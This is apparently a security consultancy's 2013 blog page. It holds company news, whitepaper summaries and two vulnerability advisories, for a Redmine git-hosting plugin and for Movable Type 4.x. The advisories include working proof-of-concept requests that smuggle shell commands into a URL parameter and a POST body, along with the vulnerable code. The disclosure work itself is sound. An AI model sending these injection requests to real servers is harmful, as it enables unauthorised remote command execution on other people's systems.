Sec-1 Supports 2013 Cyber Security Challenge

Sec-1 is delighted to have supported the 2013 Cyber Security Challenge UK last weekend as part of the first cyber camp of its kind to be held in Scotland.

The Cyber Security Challenge is a nationwide set of competitions to recruit talented people into the field of cyber security to continue the UK’s fight against online crime.

Continue reading

Posted in News | Tagged , , | Comments Off

Paper: Automated Scanning v Manual Testing: Do you know the difference?

Automated scanning tools have their place, but should never be seen as a replacement for manual testing and an effective combined security strategy. We’ve produced a whitepaper explaining why. Below you will find a couple of short snippets from the paper:

What is automated scanning?

Simply put, automated testing is a means to provide breadth during a security assessment to reduce the time and effort required to discover and report on issues.

Continue reading

Posted in White Papers | Tagged , , , , , | Comments Off

Milestone Office Move For Sec-1

As the threat of cybercrime increases, Sec-1 Ltd prepares to accelerate its growth.

By making a significant investment in new premises; the recruitment of more of the best ‘ethical hacker’ talent; and leading-edge research and development initiatives, the business is well-placed to respond to the increase in demand for accredited information security solutions.

The team has recently moved from office space in Stanningley into larger, newly refurbished premises at Centre 27 Business Park in Birstall.

Continue reading

Posted in News | Tagged , , , , , , , | Comments Off

Redmine Git Hosting Plugin: Remote Command Execution

Sec-1 Security Advisory
Advisory Name : Redmine Git Hosting Plugin: Remote Command Execution
Discovery Date : 3/7/2013
Release Date : 16/8/2013
Application : Redmine Git Hosting Plugin
Platform : Any
Severity : HIGH. Remote Command Execution
CVE : CVE-2013-4663
Discovered by : Nick Blundell
Vendor Status : Some have patched the plugin
Website : http://www.sec-1.com/blog

Vulnerability Summary

A command execution vulnerability exists in the redmine_git_hosting plugin, which integrates git server functionality into redmine. No authentication is required for exploitation via public projects, where clone (i.e. read-only) access to git repositories is permitted; otherwise a valid account with such access is required.

The vulnerability lies in the HTTP git transport handler provided by the plugin, which fails to sanitise input from which the backend git commands are constructed.

The vulnerable URI is that used in the git clone command, which can usually be found on a particular project’s page, or fabricated if the name of a project is known, for example: https://redmine.somewhere.com/someproject.git

Exploit Example

There are several possible requests to trigger the same vulnerable code, though the following delay injection proof-of-concept request was found to work on all variant forks of the redmine plugin:

curl -k “https://redmine.demo.com/someproject.git/info/refs?service=git-%60sleep%2010%60″

Vulnerable Code

There are several instances within the code of the HTTP git transport controller (git_http_controller.rb) of the redmine_git_hosting plugin where backend git commands are constructed with unsanitised user input, for example:


# Note: here service name may be controlled by the user

def get_info_refs
  service_name = get_service_type
  if service_name
    command = git_command(“#{service_name} –stateless-rpc –advertise-refs .”)
    refs = %x[#{command}]
    content_type = “application/x-git-#{service_name}-advertisement”
    …


# Note: Here reqfile may be controlled by the user

def file_exists(reqfile)
  cmd=”#{run_git_prefix()} if [ -e \"#{reqfile}\" ] ; then echo found ; else echo bad ; fi ‘ “
  is_found=%x[#{cmd}]
  is_found.chomp!
  return is_found == “found”
end

Exploit Code

Vendor Response

Since there is no official owner of this plugin, on 4th July 2013 several of the prominent fork developers were contacted, including the redmine team for their information, and of the two that replied one has responded with a patch for the plugin (see http://www.redmine.org/plugins/redmine-gitolite).

An offer was made to test any patched instances of the plugin, though as yet no developers have responded to have their patches confirmed with an instance running their forked code.

Recommendation

Ideally, the plugin should be re-written to use parametrised task execution of the git command, or at the very least the input should be whitelisted on a word or character level. If unsure, it is recommended that HTTP transport functionality be disabled on the redmine_git_hosting plugin until a fix has been confirmed.

Copyright 2013 Sec-1 LTD. All rights reserved.

Posted in Advisories | Comments Off

Moveable Type 4.x Unauthenticated Remote Command Execution

Sec-1 Security Advisory
Advisory Name : Moveable Type 4.x Unauthenticated Remote Command Execution via mt-upgrade.cgi
Discovery Date : 7/11/2012
Release Date : 22/1/2013
Application : Moveable Type 4.x
Platform : Any
Severity : HIGH. Unauthenticated Remote Command Execution
CVE : CVE-2013-0209 CVE-2012-6315
Discovered by : Nick Blundell
Vendor Status : Released patch for unmaintained 4.x branch
Website : http://www.sec-1.com/blog
Vulnerability Summary:
By directly calling an update-related CGI script with crafted input, and without requiring authentication, it is possible to execute arbitrary system commands on the host server.
MoveableType (MT) exposes a CGI script, mt-upgrade.cgi (usually at /cgi/mt/mt-upgrade.cgi), that is used during installation and updating of the platform.The vulnerability arises due to the following properties:

  1. This script may be invoked remotely without requiring authentication to any MT instance.
  2. Through a crafted POST request, it is possible to invoke particular database migration functions (i.e functions that bring the existing database up-to-date with an updated codebase) by name and with particular parameters.
  3. A particular migration function, core_drop_meta_for_table, allows a class parameter to be set which is used directly in a perl eval statement, allowing perl code injection.
Exploit Example:
With the following POST request we can gain unauthenticated code execution on the hosting server:

POST /cgi/mt/mt-upgrade.cgi HTTP/1.1
Host: [mt host name here]
Proxy-Connection: keep-alive
User-Agent: Mozilla/5...
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 104

__mode=run_actions&installing=1&steps=
[["core_drop_meta_for_table","class","`COMMAND_PAYLOAD_HERE`"]]
Vulnerable Code:
The vulnerable code lies in: lib/MT/Upgrade.pm

sub core_drop_meta_for_table {my $self = shift;
  my (%param) = @_;
  my $class = $param{class};
  my $sql = $param{sql};eval "require $class;";            <-----------------------------
  my $driver = $class->dbi_driver;
  my $dbh = $driver->rw_handle;
  my $err;
  eval {
    $dbh->do($sql) or $err = $dbh->errstr;
  };
  # ignore drop errors; the column has probably been
  # removed already
  #if ($err) {
  #    print STDERR "$err: $sql\n";
  #}return 0;
}
Exploit Code:
Metasploit exploit: movabletype_upgrade_exec.rb
Author(s): Kacper Nowak
Vendor Response:
Although the vendors no longer actively maintain the 4.x branch, they have published a patch to fix the issue: http://www.movabletype.org/2013/01/movable_type_438_patch.html
Copyright 2013 Sec-1 LTD. All rights reserved.
Posted in Advisories | Comments Off

Paper: Exploiting Transparent User Identification

This whitepaper details how a common mechanism employed by multiple Internet filtering and firewall vendors can be leveraged to gain local administrator access to domain clients, followed by domain wide administrator access given a set of conditions.

Download:

Whitepaper (PDF)
Whitepaper & PoC (ZIP)

Posted in White Papers | Comments Off